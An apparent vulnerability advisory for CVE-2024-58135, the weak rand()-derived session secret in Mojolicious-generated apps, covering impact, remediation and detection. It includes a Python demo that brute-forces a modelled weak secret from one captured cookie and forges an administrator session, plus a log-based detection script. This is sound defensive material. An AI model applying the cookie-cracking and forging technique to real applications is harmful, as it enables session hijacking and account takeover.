CVE-2024-58135
📋 TL;DR
Mojolicious applications scaffolded with 'mojo generate app' in Mojolicious 7.28 and later affected versions ship with an HMAC session secret that the generator derived from Perl's rand(), which is not a cryptographically secure source and yields far too little entropy. An attacker who holds a single signed session cookie from the application can recover the secret offline and then forge session cookies for any user. The weak value lives in the generated application's configuration file, not in the running library, so every application scaffolded with the default generator in an affected version stays vulnerable until that secret is replaced, regardless of which Mojolicious version is installed later.
💻 Affected Systems
- Mojolicious
📦 What is this software?
Mojolicious is a real-time web framework for Perl, maintained by the Mojolicious project.
⚠️ Risk & Real-World Impact
Worst Case
Attackers recover the session secret from one captured cookie, then forge cookies for any account, including administrators, without ever needing a password; every user session on the application can be hijacked.
Likely Case
Attackers forge or hijack individual user sessions, gaining unauthorized access to those accounts and the data behind them.
If Mitigated
With a strong, manually set secret (or an application regenerated under a patched version), forged cookies fail signature verification and the weakness has no practical impact.
🎯 Exploit Status
Exploitation is an offline brute force: the attacker obtains any session cookie issued by the application (one for an account they control, or even an anonymous session, is enough), then searches the small rand()-derived secret space until the HMAC matches; hashcat support for this case was contributed (see the hashcat pull request in the references). No authentication is required, and the application observes nothing during the search; it only sees the forged cookies afterwards.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check the Mojolicious repository for the latest patched version (the fix changes the application generator; it does not touch secrets already written into existing applications)
Vendor Advisory: https://github.com/mojolicious/mojo/pull/2200
Restart Required: Yes
Instructions:
1. Update Mojolicious to a patched version so that newly generated applications receive a strong secret.
2. Replace the secret in every existing application's configuration file with a freshly generated, cryptographically strong value; updating the library alone leaves the old weak secret in place.
3. Restart the application server so the new secret is loaded. All existing sessions become invalid, which is intended: any of them may have been forged.
🔧 Temporary Workarounds
Manually Set Strong Session Secret
Replace the weak secret in the application's configuration file with a cryptographically strong one: at least 32 random bytes from a CSPRNG (for example Crypt::URandom in Perl, or openssl rand -hex 32 on the command line). This needs no library update and is the actual fix for an already generated application.
Edit the config file (e.g., myapp.conf) and set 'secrets' to that value, e.g., secrets => ['your_strong_secret_here']. Mojolicious signs new cookies with the first secret in the list and uses the remaining entries only for verification (this is how rotation normally works), so do not keep the old weak secret as a second entry here: every cookie signed under it must be rejected, because any of them may have been forged.
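The following is an added example, not code from the Mojolicious project or from this advisory. It reimplements the Mojolicious signed-cookie scheme in Python (value, then "--", then a hex HMAC-SHA1 under the first configured secret; the session payload is JSON, base64-encoded with "=" padding swapped for "-") to show both the exploit status above and this workaround: an attacker holding one captured cookie enumerates the secret space offline, recovers the secret, forges an administrator cookie the application accepts, and the same forged cookie is rejected once the secret has been rotated to a CSPRNG-generated value. The weak_secret() function is a hypothetical stand-in with only 2**16 possible outputs; it does not reproduce the real generator's rand()-based derivation, it only models its low entropy.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import secrets

SEP = "--"  # Mojolicious separates the cookie value from its signature with "--"


def encode_session(session: dict) -> str:
    """Approximation of Mojolicious::Sessions: JSON, base64, '=' padding swapped for '-'."""
    raw = base64.b64encode(json.dumps(session, separators=(",", ":")).encode()).decode()
    return raw.replace("=", "-")


def decode_session(value: str) -> dict:
    return json.loads(base64.b64decode(value.replace("-", "=")))


def sign_cookie(value: str, secret: str) -> str:
    """Mojolicious-style signed cookie: value + '--' + hex HMAC-SHA1 under the signing secret."""
    mac = hmac.new(secret.encode(), value.encode(), hashlib.sha1).hexdigest()
    return f"{value}{SEP}{mac}"


def verify_cookie(cookie: str, secret_list: list[str]) -> dict | None:
    """First secret signs, every configured secret may verify (rotation). None if no secret matches."""
    value, sep, mac = cookie.rpartition(SEP)
    if not sep:
        return None
    for s in secret_list:
        expected = hmac.new(s.encode(), value.encode(), hashlib.sha1).hexdigest()
        if hmac.compare_digest(expected, mac):
            return decode_session(value)
    return None


def weak_secret(seed: int) -> str:
    """HYPOTHETICAL stand-in for the generator's rand()-derived secret: only 2**16 distinct
    outputs, so the whole space can be enumerated. Not Mojolicious's real derivation."""
    return hashlib.sha1(f"seed:{seed}".encode()).hexdigest()


def crack_secret(cookie: str, space: int = 1 << 16) -> str | None:
    """Offline attack: given one captured cookie, try every candidate secret until the HMAC
    matches. Nothing is sent to the server during this loop; hashcat does the same job on
    the real keyspace, much faster."""
    value, _, mac = cookie.rpartition(SEP)
    for seed in range(space):
        cand = weak_secret(seed)
        if hmac.compare_digest(hmac.new(cand.encode(), value.encode(), hashlib.sha1).hexdigest(), mac):
            return cand
    return None


def new_secret() -> str:
    """Replacement secret: 32 bytes from the OS CSPRNG, hex-encoded (what the config should hold)."""
    return secrets.token_hex(32)


def demo() -> dict:
    weak = weak_secret(31337)                                        # the app's weak configured secret
    victim = sign_cookie(encode_session({"user": "alice"}), weak)    # one cookie the attacker captured
    recovered = crack_secret(victim)
    forged = sign_cookie(encode_session({"user": "admin", "expires": 4102444800}), recovered)
    strong = new_secret()
    return {
        "recovered": recovered == weak,
        "forged_accepted_by_app": verify_cookie(forged, [weak]),       # app still on the weak secret
        "forged_rejected_after_rotation": verify_cookie(forged, [strong]) is None,
        "strong_secret_hex_length": len(strong),
    }


if __name__ == "__main__":
    print(demo())
```

Note that the forged cookie carries its own "expires" field: session expiry is part of the signed payload, so once the secret is known the attacker chooses it too. That is why rotating to a secret from new_secret() (or the equivalent CSPRNG call in Perl) and dropping the old one from the list is the only change that actually invalidates forged cookies.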
🧯 If You Can't Patch
- Replacing the secret (above) needs no library update and should almost always be possible; if even the configuration cannot be changed, treat every session as potentially forged. IP binding and short session timeouts give little protection on their own: the session expiry and anything else stored in the cookie sit inside the signed payload, so an attacker who knows the secret sets them freely. Only state kept server-side (for example a session identifier that is looked up in a database, with authorization decided from the server-side record) survives a forged cookie.
- A WAF cannot see the brute force, which runs offline against a captured cookie; at most it can rate-limit or flag clients that present many different or unverifiable session cookies.
🔍 How to Verify
Check if Vulnerable:
Check whether the application was scaffolded with 'mojo generate app' under Mojolicious 7.28 or a later affected version, and whether the 'secrets' entry in its configuration file is still the value the generator wrote (i.e. it has never been replaced by hand). A secret that came from the generator rather than from a CSPRNG is weak regardless of the Mojolicious version now installed.
Check Version:
perl -MMojolicious -e 'print Mojolicious->VERSION'
Verify Fix Applied:
Verify that the configuration file contains a strong, manually generated secret and that the old generated value is no longer present anywhere in the secrets list. An updated Mojolicious version on its own does not fix an existing application; it only affects applications generated after the update.
📡 Detection & Monitoring
Log Indicators:
- Mojolicious does not answer 401 or 403 when a session cookie's signature fails; it silently discards the session and serves the request as unauthenticated, and the bad-signature message is only written at a verbose log level. Look instead for accounts that appear from a new client without a preceding login, or temporarily raise the log level on a suspect application to surface rejected signatures.
Network Indicators:
- A single client presenting many distinct 'mojolicious' session cookie values (the default session cookie name), or session cookies that fail verification under the current secrets.
SIEM Query:
source="web_logs" AND cookie="*mojolicious=*" | stats dc(cookie) AS distinct_cookies, count BY src_ip | where distinct_cookies > 20
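As an added example (not part of the original advisory and not Mojolicious project code), the detection logic described above run over constructed access-log lines: per source IP it counts session cookies whose signature does not verify under the application's live secrets and how many distinct session cookie values the client presented. The log format, the CURRENT_SECRETS list and the OLD_WEAK_SECRET value are assumptions for the example; the signature check only works where the detector has the live secrets, which argues for running it inside the application (or a sidecar that shares its config) rather than exporting session cookies to a SIEM.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import re
from collections import defaultdict

SESSION_COOKIE = "mojolicious"   # Mojolicious's default session cookie name

# Assumptions for this example: the app's live secret list after rotation, and the old
# weak secret an attacker is assumed to have cracked. Both are placeholder values.
CURRENT_SECRETS = ["c0ffee" * 10]
OLD_WEAK_SECRET = "weak"

# Constructed log format: '<src_ip> <method> <path> <status> "<Cookie header>"'
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def mojo_sign(value: str, secret: str) -> str:
    """Mojolicious-style signed cookie: value + '--' + hex HMAC-SHA1."""
    return value + "--" + hmac.new(secret.encode(), value.encode(), hashlib.sha1).hexdigest()


def signature_ok(cookie: str, secret_list: list[str]) -> bool:
    """True if any configured secret verifies the cookie's HMAC."""
    value, sep, mac = cookie.rpartition("--")
    if not sep:
        return False
    return any(hmac.compare_digest(hmac.new(s.encode(), value.encode(), hashlib.sha1).hexdigest(), mac)
               for s in secret_list)


def session_value(user: str) -> str:
    """Cookie payload as Mojolicious would encode it: JSON, base64, '=' padding -> '-'."""
    return base64.b64encode(f'{{"user":"{user}"}}'.encode()).decode().replace("=", "-")


def build_sample_log() -> list[str]:
    """CONSTRUCTED sample lines. 10.0.0.5 and 198.51.100.7 carry cookies signed with the live
    secret; 203.0.113.9 presents several cookies signed with the cracked old secret, as a
    forging attacker would after the rotation."""
    alice = mojo_sign(session_value("alice"), CURRENT_SECRETS[0])
    bob = mojo_sign(session_value("bob"), CURRENT_SECRETS[0])
    forged = [mojo_sign(session_value(u), OLD_WEAK_SECRET) for u in ("admin", "root", "alice")]
    return [
        f'10.0.0.5 GET /dashboard 200 "{SESSION_COOKIE}={alice}; theme=dark"',
        f'10.0.0.5 GET /account 200 "{SESSION_COOKIE}={alice}"',
        f'198.51.100.7 GET /dashboard 200 "{SESSION_COOKIE}={bob}"',
        f'203.0.113.9 GET /admin 200 "{SESSION_COOKIE}={forged[0]}"',
        f'203.0.113.9 GET /admin 200 "{SESSION_COOKIE}={forged[1]}"',
        f'203.0.113.9 GET /account 200 "{SESSION_COOKIE}={forged[2]}"',
        '203.0.113.9 GET /login 200 ""',
    ]


def analyse(lines: list[str], secret_list: list[str], distinct_threshold: int = 3) -> dict:
    """Per source IP: cookies failing verification under the live secrets, and distinct cookie
    values presented. Flag an IP when either signal fires. Status codes are useless here:
    Mojolicious answers 200 whether or not the session signature verified."""
    per_ip = defaultdict(lambda: {"bad_sig": 0, "distinct": set()})
    cookie_re = re.compile(rf"(?:^|;\s*){re.escape(SESSION_COOKIE)}=([^;\s]+)")
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        src_ip, cookie_hdr = m.group(1), m.group(5)
        c = cookie_re.search(cookie_hdr)
        if not c:
            continue
        per_ip[src_ip]["distinct"].add(c.group(1))
        if not signature_ok(c.group(1), secret_list):
            per_ip[src_ip]["bad_sig"] += 1
    return {
        ip: {"bad_sig": d["bad_sig"], "distinct": len(d["distinct"])}
        for ip, d in per_ip.items()
        if d["bad_sig"] or len(d["distinct"]) >= distinct_threshold
    }


def flagged_ips() -> dict:
    return analyse(build_sample_log(), CURRENT_SECRETS)


if __name__ == "__main__":
    print(flagged_ips())
```

Only 203.0.113.9 is flagged: three cookies that fail verification and three distinct cookie values from one client, while the legitimate users each reuse a single valid cookie. The distinct-value count is the one signal a SIEM can compute from access logs alone; the bad-signature count needs the secrets, and an attacker who cracked the secret before the rotation produces no bad signatures at all until the secret is changed.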
🔗 References
- https://github.com/hashcat/hashcat/pull/4090
- https://github.com/mojolicious/mojo/pull/2200
- https://lists.debian.org/debian-perl/2025/05/msg00016.html
- https://lists.debian.org/debian-perl/2025/05/msg00017.html
- https://lists.debian.org/debian-perl/2025/05/msg00018.html
- https://metacpan.org/release/SRI/Mojolicious-7.28/source/lib/Mojolicious/Command/generate/app.pm#L220
- https://metacpan.org/release/SRI/Mojolicious-9.38/source/lib/Mojolicious/Command/Author/generate/app.pm#L202
- https://metacpan.org/release/SRI/Mojolicious-9.39/source/lib/Mojo/Util.pm#L181
- https://perldoc.perl.org/functions/rand
- https://security.metacpan.org/docs/guides/random-data-for-security.html